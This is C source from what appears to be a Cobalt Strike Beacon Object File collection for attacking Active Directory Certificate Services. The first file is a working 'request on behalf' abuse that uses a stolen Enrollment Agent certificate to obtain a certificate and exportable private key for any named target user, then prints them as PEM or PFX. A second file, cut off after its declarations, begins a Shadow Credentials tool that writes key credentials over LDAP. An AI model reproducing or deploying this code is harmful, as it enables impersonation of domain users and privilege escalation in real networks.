	hCertStore = CRYPT32$CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, 0, CERT_SYSTEM_STORE_CURRENT_USER, L"MY");
	if (!hCertStore) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to open certificate store: %lu\n", KERNEL32$GetLastError());
		return NULL;
	}

	// Import PFX to temporary store
	hPfxStore = CRYPT32$PFXImportCertStore(&pfxData, wszPassword ? wszPassword : L"", CRYPT_USER_KEYSET);
	if (!hPfxStore) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to import PFX: %lu\n", KERNEL32$GetLastError());
		CRYPT32$CertCloseStore(hCertStore, 0);
		return NULL;
	}

	// Get the certificate from PFX store
	pCert = CRYPT32$CertEnumCertificatesInStore(hPfxStore, NULL);
	if (!pCert) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to enumerate certificates in PFX\n");
		CRYPT32$CertCloseStore(hPfxStore, 0);
		CRYPT32$CertCloseStore(hCertStore, 0);
		return NULL;
	}

	// Add to MY store temporarily (needed for signing)
	if (!CRYPT32$CertAddCertificateContextToStore(hCertStore, pCert, CERT_STORE_ADD_ALWAYS, &pStoreCert)) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to add certificate to store: %lu\n", KERNEL32$GetLastError());
		CRYPT32$CertFreeCertificateContext(pCert);
		CRYPT32$CertCloseStore(hPfxStore, 0);
		CRYPT32$CertCloseStore(hCertStore, 0);
		return NULL;
	}

	// Clean up original cert from PFX store
	CRYPT32$CertDeleteCertificateFromStore(pCert);
	CRYPT32$CertCloseStore(hPfxStore, 0);

	*ppCert = pStoreCert;
	return hCertStore;
}

HRESULT RequestCertOnBehalf( LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzTargetUser, LPBYTE pbEnrollmentCert, DWORD cbEnrollmentCert, LPCWSTR lpswzEaCertPassword, LPCWSTR lpswzPfxPassword, BOOL bPem)
{
	HRESULT hr = S_OK;
	
	// COM interfaces
	IX509CertificateRequestCmc *pCmc = NULL;
	IX509Enrollment *pEnroll = NULL;
	IX509CertificateRequest *pRequest = NULL;
	IX509CertificateRequest *pInnerRequest = NULL;
	IX509CertificateRequestPkcs10 *pPkcs10 = NULL;
	IX509PrivateKey *pKey = NULL;
	ISignerCertificate *pSignerCertificate = NULL;
	ISignerCertificates *pSignerCertificates = NULL;
	IX509EnrollmentStatus *pStatus = NULL;
	
	// Strings
	BSTR bstrTemplateName = NULL;
	BSTR bstrRequesterName = NULL;
	BSTR bstrEaCert = NULL;
	BSTR bstrCertificate = NULL;
	BSTR bstrPassword = NULL;
	BSTR bstrErrorText = NULL;
	BSTR bstrStatusText = NULL;
	
	// Certificate store
	HCERTSTORE hCertStore = NULL;
	PCCERT_CONTEXT pEnrollCert = NULL;
	PCCERT_CONTEXT pResultCert = NULL;
	PCCERT_CONTEXT pFoundCert = NULL;
	
	// PEM export variables
	BSTR bstrExportType = NULL;
	BSTR bstrPrivateKey = NULL;
	DWORD dwPrivateKeyLen = 0;
	LPBYTE pPrivateDER = NULL;
	DWORD pemPrivateSize = 0;
	LPWSTR pPrivatePEM = NULL;
	
	// PFX export variables
	BSTR bstrContainerName = NULL;
	BSTR bstrProviderName = NULL;
	X509ProviderType providerType = 0;
	LPCWSTR wszPfxPassword = (lpswzPfxPassword && lpswzPfxPassword[0]) ? lpswzPfxPassword : L"";
	DWORD dwCertLen = 0;
	LPBYTE pbCertDER = NULL;
	PCCERT_CONTEXT pCertContext = NULL;
	PCCERT_CONTEXT pStoreCert = NULL;
	HCERTSTORE hMemStore = NULL;
	CRYPT_KEY_PROV_INFO keyProvInfo = {0};
	CRYPT_DATA_BLOB pfxBlob = {0};
	DWORD dwPfxB64Len = 0;
	LPSTR pszPfxB64 = NULL;
	
	EnrollmentEnrollStatus enrollStatus;

	// CLSIDs and IIDs
	CLSID CLSID_X509CertificateRequestCmc = {0x884e2045, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};
	IID IID_IX509CertificateRequestCmc = {0x728ab345, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};

	CLSID CLSID_SignerCertificate = {0x884e203d, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};
	IID IID_ISignerCertificate = {0x728ab33d, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};

	CLSID CLSID_CX509Enrollment = {0x884e2046, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};
	IID IID_IX509Enrollment = {0x728ab346, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};

	IID IID_IX509CertificateRequestPkcs10 = {0x728ab342, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};

	internal_printf("[*] CA            : %S\n", lpswzCA ? lpswzCA : L"(null)");
	internal_printf("[*] Template      : %S\n", lpswzTemplate ? lpswzTemplate : L"(null)");
	internal_printf("[*] Target User   : %S\n", lpswzTargetUser ? lpswzTargetUser : L"(null)");
	internal_printf("[*] Cert size     : %lu\n", cbEnrollmentCert);

	// Initialize COM
	hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
	if (hr == RPC_E_CHANGED_MODE || hr == S_FALSE) {
		hr = S_OK;
	}
	CHECK_RETURN_FAIL("CoInitializeEx", hr);

	// Load Enrollment Agent certificate
	hCertStore = LoadEnrollmentAgentCert(pbEnrollmentCert, cbEnrollmentCert, lpswzEaCertPassword, &pEnrollCert);
	CHECK_RETURN_NULL("LoadEnrollmentAgentCert", hCertStore, hr);
	internal_printf("[+] Enrollment Agent certificate loaded\n");

	// Allocate strings
	bstrTemplateName = OLEAUT32$SysAllocString(lpswzTemplate);
	bstrRequesterName = OLEAUT32$SysAllocString(lpswzTargetUser);
	bstrPassword = OLEAUT32$SysAllocString(wszPfxPassword);

	// Create exportable private key first
	{
		CLSID CLSID_CX509PrivateKey = {0x884e200c, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};
		IID IID_IX509PrivateKey = {0x728ab30c, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};
		BSTR bstrProvName = NULL;
		
		hr = OLE32$CoCreateInstance(&CLSID_CX509PrivateKey, NULL, CLSCTX_INPROC_SERVER, &IID_IX509PrivateKey, (LPVOID*)&pKey);
		CHECK_RETURN_FAIL("CoCreateInstance(PrivateKey)", hr);
		
		// Force CAPI provider for PFX export compatibility
		bstrProvName = OLEAUT32$SysAllocString(MS_ENHANCED_PROV_W);
		hr = pKey->lpVtbl->put_ProviderName(pKey, bstrProvName);
		OLEAUT32$SysFreeString(bstrProvName);
		CHECK_RETURN_FAIL("put_ProviderName", hr);
		
		hr = pKey->lpVtbl->put_ProviderType(pKey, XCN_PROV_RSA_FULL);
		CHECK_RETURN_FAIL("put_ProviderType", hr);
		
		hr = pKey->lpVtbl->put_Length(pKey, PRIVATE_KEY_LENGTH);
		CHECK_RETURN_FAIL("put_Length", hr);
		
		hr = pKey->lpVtbl->put_KeySpec(pKey, XCN_AT_KEYEXCHANGE);
		CHECK_RETURN_FAIL("put_KeySpec", hr);
		
		hr = pKey->lpVtbl->put_MachineContext(pKey, VARIANT_FALSE);
		CHECK_RETURN_FAIL("put_MachineContext", hr);
		
		// Make key exportable
		hr = pKey->lpVtbl->put_ExportPolicy(pKey, XCN_NCRYPT_ALLOW_EXPORT_FLAG | XCN_NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG);
		CHECK_RETURN_FAIL("put_ExportPolicy", hr);
		
		hr = pKey->lpVtbl->Create(pKey);
		CHECK_RETURN_FAIL("PrivateKey->Create", hr);
		internal_printf("[+] Exportable private key created\n");
	}

	// Create inner PKCS10 request with our exportable key
	{
		CLSID CLSID_CX509CertificateRequestPkcs10 = {0x884e2042, 0x217d, 0x11da, {0xb2, 0xa4, 0x00, 0x0e, 0x7b, 0xbb, 0x2b, 0x09}};
		
		hr = OLE32$CoCreateInstance(&CLSID_CX509CertificateRequestPkcs10, NULL, CLSCTX_INPROC_SERVER, &IID_IX509CertificateRequestPkcs10, (LPVOID*)&pPkcs10);
		CHECK_RETURN_FAIL("CoCreateInstance(PKCS10)", hr);
		
		hr = pPkcs10->lpVtbl->InitializeFromPrivateKey(pPkcs10, ContextUser, pKey, bstrTemplateName);
		CHECK_RETURN_FAIL("InitializeFromPrivateKey", hr);
		internal_printf("[+] PKCS10 request initialized with exportable key\n");
	}

	// Create CMC request wrapping the PKCS10
	hr = OLE32$CoCreateInstance(&CLSID_X509CertificateRequestCmc, NULL, CLSCTX_INPROC_SERVER, &IID_IX509CertificateRequestCmc, (LPVOID*)&pCmc);
	CHECK_RETURN_FAIL("CoCreateInstance(CMC)", hr);

	hr = pCmc->lpVtbl->InitializeFromInnerRequest(pCmc, (IX509CertificateRequest*)pPkcs10);
	CHECK_RETURN_FAIL("InitializeFromInnerRequest", hr);
	internal_printf("[+] CMC request initialized for template: %S\n", lpswzTemplate);

	// Set requester name (the target user)
	hr = pCmc->lpVtbl->put_RequesterName(pCmc, bstrRequesterName);
	CHECK_RETURN_FAIL("put_RequesterName", hr);
	internal_printf("[+] Requester set to: %S\n", lpswzTargetUser);

	// Create signer certificate from EA cert
	bstrEaCert = OLEAUT32$SysAllocStringByteLen((CHAR const *)pEnrollCert->pbCertEncoded, pEnrollCert->cbCertEncoded);

	hr = OLE32$CoCreateInstance(&CLSID_SignerCertificate, NULL, CLSCTX_INPROC_SERVER, &IID_ISignerCertificate, (LPVOID*)&pSignerCertificate);
	CHECK_RETURN_FAIL("CoCreateInstance(SignerCertificate)", hr);

	hr = pSignerCertificate->lpVtbl->Initialize(pSignerCertificate, VARIANT_FALSE, VerifyNone, XCN_CRYPT_STRING_BINARY, bstrEaCert);
	CHECK_RETURN_FAIL("SignerCertificate->Initialize", hr);

	// Add signer to CMC request
	hr = pCmc->lpVtbl->get_SignerCertificates(pCmc, &pSignerCertificates);
	CHECK_RETURN_FAIL("get_SignerCertificates", hr);

	hr = pSignerCertificates->lpVtbl->Add(pSignerCertificates, pSignerCertificate);
	CHECK_RETURN_FAIL("SignerCertificates->Add", hr);
	internal_printf("[+] Request signed with Enrollment Agent certificate\n");

	// Create enrollment and submit
	hr = OLE32$CoCreateInstance(&CLSID_CX509Enrollment, NULL, CLSCTX_INPROC_SERVER, &IID_IX509Enrollment, (LPVOID*)&pEnroll);
	CHECK_RETURN_FAIL("CoCreateInstance(Enrollment)", hr);

	hr = pEnroll->lpVtbl->InitializeFromRequest(pEnroll, (IX509CertificateRequest *)pCmc);
	CHECK_RETURN_FAIL("InitializeFromRequest", hr);

	hr = pEnroll->lpVtbl->Enroll(pEnroll);
	CHECK_RETURN_FAIL("Enroll", hr);

	// Check enrollment status
	hr = pEnroll->lpVtbl->get_Status(pEnroll, &pStatus);
	CHECK_RETURN_FAIL("get_Status", hr);

	hr = pStatus->lpVtbl->get_Status(pStatus, &enrollStatus);
	CHECK_RETURN_FAIL("get_Status(status)", hr);

	pStatus->lpVtbl->get_ErrorText(pStatus, &bstrErrorText);
	pStatus->lpVtbl->get_Text(pStatus, &bstrStatusText);

	if (enrollStatus != Enrolled) {
		if (enrollStatus == EnrollPended) {
			internal_printf("[!] Request pending\n");
		} else {
			internal_printf("[!] Request failed\n");
		}
		if (bstrErrorText) internal_printf("    Error: %S\n", bstrErrorText);
		if (bstrStatusText) internal_printf("    Status: %S\n", bstrStatusText);
		hr = E_FAIL;
		goto fail;
	}

	internal_printf("[+] Certificate issued!\n");

	// Get the certificate
	hr = pEnroll->lpVtbl->get_Certificate(pEnroll, XCN_CRYPT_STRING_BASE64, &bstrCertificate);
	CHECK_RETURN_FAIL("get_Certificate", hr);

	// Get container name for export
	hr = pKey->lpVtbl->get_UniqueContainerName(pKey, &bstrContainerName);
	CHECK_RETURN_FAIL("get_UniqueContainerName", hr);

	if (bPem) {
		// PEM output format
		bstrExportType = OLEAUT32$SysAllocString(BCRYPT_PRIVATE_KEY_BLOB);
		hr = pKey->lpVtbl->Export(pKey, bstrExportType, XCN_CRYPT_STRING_BINARY, &bstrPrivateKey);
		CHECK_RETURN_FAIL("pKey->Export()", hr);
		
		// Convert from BCRYPT_PRIVATE_KEY_BLOB to DER
		CRYPT32$CryptEncodeObjectEx(X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, PKCS_RSA_PRIVATE_KEY, (LPCVOID)bstrPrivateKey, 0, NULL, NULL, &dwPrivateKeyLen);
		pPrivateDER = (LPBYTE)intAlloc(dwPrivateKeyLen);
		CHECK_RETURN_NULL("intAlloc for private DER", pPrivateDER, hr);
		hr = CRYPT32$CryptEncodeObjectEx(X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, PKCS_RSA_PRIVATE_KEY, (LPCVOID)bstrPrivateKey, 0, NULL, (LPVOID)pPrivateDER, &dwPrivateKeyLen);
		CHECK_RETURN_FALSE("CryptEncodeObjectEx", hr);

		// Convert from DER to PEM format
		CRYPT32$CryptBinaryToStringW(pPrivateDER, dwPrivateKeyLen, CRYPT_STRING_BASE64, NULL, &pemPrivateSize);
		pPrivatePEM = (LPWSTR)intAlloc(pemPrivateSize * sizeof(WCHAR));
		CHECK_RETURN_NULL("intAlloc for private PEM", pPrivatePEM, hr);
		hr = CRYPT32$CryptBinaryToStringW(pPrivateDER, dwPrivateKeyLen, CRYPT_STRING_BASE64, pPrivatePEM, &pemPrivateSize);
		CHECK_RETURN_FALSE("CryptBinaryToStringW", hr);

		// Display the certificate in PEM format
		internal_printf("[*] cert.pem:\n");
		internal_printf("-----BEGIN RSA PRIVATE KEY-----\n");
		internal_printf("%S", pPrivatePEM);
		internal_printf("-----END RSA PRIVATE KEY-----\n");
		internal_printf("-----BEGIN CERTIFICATE-----\n");
		internal_printf("%S", bstrCertificate);
		internal_printf("-----END CERTIFICATE-----\n");
		internal_printf("[*] Convert with:\nopenssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx\n");
	} else {
		// PFX output format
		CRYPT32$CryptStringToBinaryW(bstrCertificate, 0, CRYPT_STRING_BASE64, NULL, &dwCertLen, NULL, NULL);
		pbCertDER = (LPBYTE)intAlloc(dwCertLen);
		CHECK_RETURN_NULL("intAlloc for cert DER", pbCertDER, hr);
		hr = CRYPT32$CryptStringToBinaryW(bstrCertificate, 0, CRYPT_STRING_BASE64, pbCertDER, &dwCertLen, NULL, NULL);
		CHECK_RETURN_FALSE("CryptStringToBinaryW", hr);

		pCertContext = CRYPT32$CertCreateCertificateContext(X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, pbCertDER, dwCertLen);
		CHECK_RETURN_NULL("CertCreateCertificateContext", pCertContext, hr);

		hMemStore = CRYPT32$CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL);
		CHECK_RETURN_NULL("CertOpenStore", hMemStore, hr);

		hr = CRYPT32$CertAddCertificateContextToStore(hMemStore, pCertContext, CERT_STORE_ADD_ALWAYS, &pStoreCert);
		CHECK_RETURN_FALSE("CertAddCertificateContextToStore", hr);

		keyProvInfo.pwszContainerName = bstrContainerName;
		keyProvInfo.pwszProvName = MS_ENHANCED_PROV_W;
		keyProvInfo.dwProvType = PROV_RSA_FULL;
		keyProvInfo.dwFlags = 0;
		keyProvInfo.dwKeySpec = AT_KEYEXCHANGE;

		hr = CRYPT32$CertSetCertificateContextProperty(pStoreCert, CERT_KEY_PROV_INFO_PROP_ID, 0, &keyProvInfo);
		CHECK_RETURN_FALSE("CertSetCertificateContextProperty", hr);

		CRYPT32$PFXExportCertStoreEx(hMemStore, &pfxBlob, wszPfxPassword, NULL, EXPORT_PRIVATE_KEYS);
		if (pfxBlob.cbData > 0) {
			pfxBlob.pbData = (BYTE*)intAlloc(pfxBlob.cbData);
			CHECK_RETURN_NULL("intAlloc for PFX", pfxBlob.pbData, hr);

			hr = CRYPT32$PFXExportCertStoreEx(hMemStore, &pfxBlob, wszPfxPassword, NULL, EXPORT_PRIVATE_KEYS);
			CHECK_RETURN_FALSE("PFXExportCertStoreEx", hr);

			CRYPT32$CryptBinaryToStringA(pfxBlob.pbData, pfxBlob.cbData, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &dwPfxB64Len);
			pszPfxB64 = (LPSTR)intAlloc(dwPfxB64Len + 1);
			CHECK_RETURN_NULL("intAlloc for PFX B64", pszPfxB64, hr);
			CRYPT32$CryptBinaryToStringA(pfxBlob.pbData, pfxBlob.cbData, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, pszPfxB64, &dwPfxB64Len);

			internal_printf("[*] cert.pfx (password: '%S'):\n\n%s\n\n", wszPfxPassword, pszPfxB64);
		}
	}

	// Cleanup: Delete private key and certificate from store
	if (pKey) {
		pKey->lpVtbl->Close(pKey);
		pKey->lpVtbl->Delete(pKey);
		internal_printf("[+] Private key deleted from local store\n");
	}

	hr = S_OK;

fail:
	// PEM cleanup
	SAFE_INT_FREE(pPrivateDER);
	SAFE_INT_FREE(pPrivatePEM);
	SAFE_SYS_FREE(bstrPrivateKey);
	SAFE_SYS_FREE(bstrExportType);
	// PFX cleanup
	SAFE_INT_FREE(pszPfxB64);
	if (pfxBlob.pbData) intFree(pfxBlob.pbData);
	if (pStoreCert) CRYPT32$CertFreeCertificateContext(pStoreCert);
	if (pCertContext) CRYPT32$CertFreeCertificateContext(pCertContext);
	if (hMemStore) CRYPT32$CertCloseStore(hMemStore, 0);
	SAFE_INT_FREE(pbCertDER);
	// COM cleanup
	SAFE_RELEASE(pKey);
	SAFE_RELEASE(pPkcs10);
	SAFE_RELEASE(pInnerRequest);
	SAFE_RELEASE(pRequest);
	SAFE_RELEASE(pStatus);
	SAFE_RELEASE(pEnroll);
	SAFE_RELEASE(pSignerCertificates);
	SAFE_RELEASE(pSignerCertificate);
	SAFE_RELEASE(pCmc);
	// String cleanup
	SAFE_SYS_FREE(bstrContainerName);
	SAFE_SYS_FREE(bstrProviderName);
	SAFE_SYS_FREE(bstrStatusText);
	SAFE_SYS_FREE(bstrErrorText);
	SAFE_SYS_FREE(bstrCertificate);
	SAFE_SYS_FREE(bstrEaCert);
	SAFE_SYS_FREE(bstrPassword);
	SAFE_SYS_FREE(bstrRequesterName);
	SAFE_SYS_FREE(bstrTemplateName);
	// Certificate cleanup - delete EA cert from MY store
	if (pEnrollCert) {
		CRYPT32$CertDeleteCertificateFromStore(pEnrollCert);
		pEnrollCert = NULL; // CertDeleteCertificateFromStore frees the context
	}
	if (hCertStore) CRYPT32$CertCloseStore(hCertStore, 0);

	OLE32$CoUninitialize();

	return hr;
}

#ifdef BOF
VOID go( IN PCHAR Buffer, IN ULONG Length )
{
	HRESULT hr = S_OK;
	datap parser;
	LPCWSTR lpswzCA = NULL;
	LPCWSTR lpswzTemplate = NULL;
	LPCWSTR lpswzTargetUser = NULL;
	LPCWSTR lpswzEaCertPassword = NULL;
	LPCWSTR lpswzPfxPassword = NULL;
	LPBYTE pbEnrollmentCert = NULL;
	int cbEnrollmentCert = 0;
	BOOL bPem = FALSE;

	if (!bofstart())
		return;

	BeaconDataParse(&parser, Buffer, Length);
	lpswzCA = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzTemplate = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzTargetUser = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzEaCertPassword = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzPfxPassword = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	pbEnrollmentCert = (LPBYTE)BeaconDataExtract(&parser, &cbEnrollmentCert);
	bPem = (BOOL)BeaconDataShort(&parser);

	internal_printf("\n=== ADCS Request On Behalf ===\n");

	hr = RequestCertOnBehalf( lpswzCA, lpswzTemplate, lpswzTargetUser, pbEnrollmentCert, cbEnrollmentCert, lpswzEaCertPassword, lpswzPfxPassword, bPem );
	if (S_OK != hr) {
		BeaconPrintf(CALLBACK_ERROR, "RequestCertOnBehalf failed: 0x%08lx\n", hr);
		goto fail;
	}

	internal_printf("\n--- SUCCESS ---\n");

fail:
	printoutput(TRUE);
	bofstop();
};
#else
int main(int argc, char **argv)
{
	internal_printf("Test mode not implemented\n");
	return 0;
}
#endif


================================================
FILE: AD-BOF/ADCS-BOF/src/shadow/certi_shadow.c
================================================
/* Prevent winsock.h/winsock2.h conflict */
#define WIN32_LEAN_AND_MEAN
#define _WINSOCK_DEPRECATED_NO_WARNINGS

/* Use old-style swprintf (no size parameter) for MSVC compatibility */
#define _CRT_NON_CONFORMING_SWPRINTFS

#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <wincrypt.h>
#include <winldap.h>
#include <dsgetdc.h>
#include <lm.h>
#include <time.h>

typedef void* LPUNKNOWN;
typedef WCHAR OLECHAR;
typedef OLECHAR* LPOLESTR;
typedef OLECHAR* BSTR;
typedef LONG DISPID;
typedef unsigned int UINT;

#define CLSCTX_INPROC_SERVER 0x1

#include "beacon.h"
#define CALLBACK_OUTPUT 0x0
#define CALLBACK_ERROR 0x0d

DECLSPEC_IMPORT int WINAPI USER32$wsprintfW(LPWSTR, LPCWSTR, ...);
#define SWPRINTF USER32$wsprintfW

#define KCEI_VERSION        0x00
#define KCEI_KEYID          0x01
#define KCEI_KEYHASH        0x02
#define KCEI_KEYMATERIAL    0x03
#define KCEI_KEYUSAGE       0x04
#define KCEI_KEYSOURCE      0x05
#define KCEI_DEVICEID       0x06
#define KCEI_CUSTOMKEYINFO  0x07
#define KCEI_KEYLASTLOGON   0x08
#define KCEI_KEYCREATION    0x09

#define KEY_USAGE_NGC       0x01
#define KEY_USAGE_FIDO      0x07
#define KEY_SOURCE_AD       0x00
#define KEY_SOURCE_AZUREAD  0x01

/* LDAP constants */
#ifndef LDAP_PORT
#define LDAP_PORT 389
#endif
#ifndef LDAP_SCOPE_SUBTREE
#define LDAP_SCOPE_SUBTREE 0x02
#endif
#ifndef LDAP_AUTH_NEGOTIATE
#define LDAP_AUTH_NEGOTIATE 0x0486
#endif
#ifndef LDAP_OPT_REFERRALS
#define LDAP_OPT_REFERRALS 0x08
#endif
#ifndef LDAP_SUCCESS
#define LDAP_SUCCESS 0x00
#endif
#ifndef LDAP_MOD_ADD
#define LDAP_MOD_ADD 0x00
#endif
#ifndef LDAP_MOD_BVALUES
#define LDAP_MOD_BVALUES 0x80
#endif

/* BCRYPT_RSAKEY_BLOB magic */
#define BCRYPT_RSAPUBLIC_MAGIC  0x31415352  /* "RSA1" */

#define szOID_NT_PRINCIPAL_NAME "1.3.6.1.4.1.311.20.2.3"

/* Global state for Shadow Credential cleanup */
static WCHAR* g_wszKeyCredValue = NULL;
static WCHAR g_wszTargetDN[512] = { 0 };
static char g_szDomain[256] = { 0 };
static GUID g_deviceId = { 0 };

/* Crypto - ADVAPI32 */
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptAcquireContextW(HCRYPTPROV*, LPCWSTR, LPCWSTR, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptReleaseContext(HCRYPTPROV, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGenKey(HCRYPTPROV, ALG_ID, DWORD, HCRYPTKEY*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyKey(HCRYPTKEY);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGenRandom(HCRYPTPROV, DWORD, BYTE*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptCreateHash(HCRYPTPROV, ALG_ID, HCRYPTKEY, DWORD, HCRYPTHASH*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptHashData(HCRYPTHASH, const BYTE*, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGetHashParam(HCRYPTHASH, DWORD, BYTE*, DWORD*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyHash(HCRYPTHASH);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptExportKey(HCRYPTKEY, HCRYPTKEY, DWORD, DWORD, BYTE*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID, LPSTR*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$IsValidSid(PSID);
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetLengthSid(PSID);

/* Crypto - CRYPT32 */
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptEncodeObjectEx(DWORD, LPCSTR, const void*, DWORD, PCRYPT_ENCODE_PARA, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptDecodeObjectEx(DWORD, LPCSTR, const BYTE*, DWORD, DWORD, PCRYPT_DECODE_PARA, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptBinaryToStringA(const BYTE*, DWORD, DWORD, LPSTR, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptStringToBinaryA(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertStrToNameA(DWORD, LPCSTR, DWORD, void*, BYTE*, DWORD*, LPCSTR*);
DECLSPEC_IMPORT PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext(DWORD, const BYTE*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertFreeCertificateContext(PCCERT_CONTEXT);
DECLSPEC_IMPORT HCERTSTORE WINAPI CRYPT32$CertOpenStore(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, const void*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertCloseStore(HCERTSTORE, DWORD);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertAddCertificateContextToStore(HCERTSTORE, PCCERT_CONTEXT, DWORD, PCCERT_CONTEXT*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertSetCertificateContextProperty(PCCERT_CONTEXT, DWORD, DWORD, const void*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$PFXExportCertStoreEx(HCERTSTORE, CRYPT_DATA_BLOB*, LPCWSTR, void*, DWORD);
DECLSPEC_IMPORT HCERTSTORE WINAPI CRYPT32$PFXImportCertStore(CRYPT_DATA_BLOB*, LPCWSTR, DWORD);
DECLSPEC_IMPORT PCCERT_CONTEXT WINAPI CRYPT32$CertEnumCertificatesInStore(HCERTSTORE, PCCERT_CONTEXT);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptAcquireCertificatePrivateKey(PCCERT_CONTEXT, DWORD, void*, HCRYPTPROV_OR_NCRYPT_KEY_HANDLE*, DWORD*, BOOL*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptExportPublicKeyInfo(HCRYPTPROV, DWORD, DWORD, PCERT_PUBLIC_KEY_INFO, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptSignAndEncodeCertificate(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE, DWORD, DWORD, LPCSTR, const void*, PCRYPT_ALGORITHM_IDENTIFIER, const void*, BYTE*, DWORD*);
DECLSPEC_IMPORT HCRYPTMSG WINAPI CRYPT32$CryptMsgOpenToEncode(DWORD, DWORD, DWORD, const void*, LPSTR, PCMSG_STREAM_INFO);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgUpdate(HCRYPTMSG, const BYTE*, DWORD, BOOL);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgGetParam(HCRYPTMSG, DWORD, DWORD, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgClose(HCRYPTMSG);

/* COM */
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateGuid(GUID*);

/* NetAPI */
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameW(LPCWSTR, LPCWSTR, GUID*, LPCWSTR, ULONG, PDOMAIN_CONTROLLER_INFOW*);
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);

/* LDAP */
DECLSPEC_IMPORT LDAP* WINAPI WLDAP32$ldap_initW(PWSTR, ULONG);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_bind_sW(LDAP*, PWSTR, PWSTR, ULONG);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_search_sW(LDAP*, PWSTR, ULONG, PWSTR, PWSTR*, ULONG, LDAPMessage**);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_unbind(LDAP*);
DECLSPEC_IMPORT LDAPMessage* WINAPI WLDAP32$ldap_first_entry(LDAP*, LDAPMessage*);
DECLSPEC_IMPORT PWSTR WINAPI WLDAP32$ldap_get_dnW(LDAP*, LDAPMessage*);
DECLSPEC_IMPORT struct berval** WINAPI WLDAP32$ldap_get_values_lenW(LDAP*, LDAPMessage*, PWSTR);
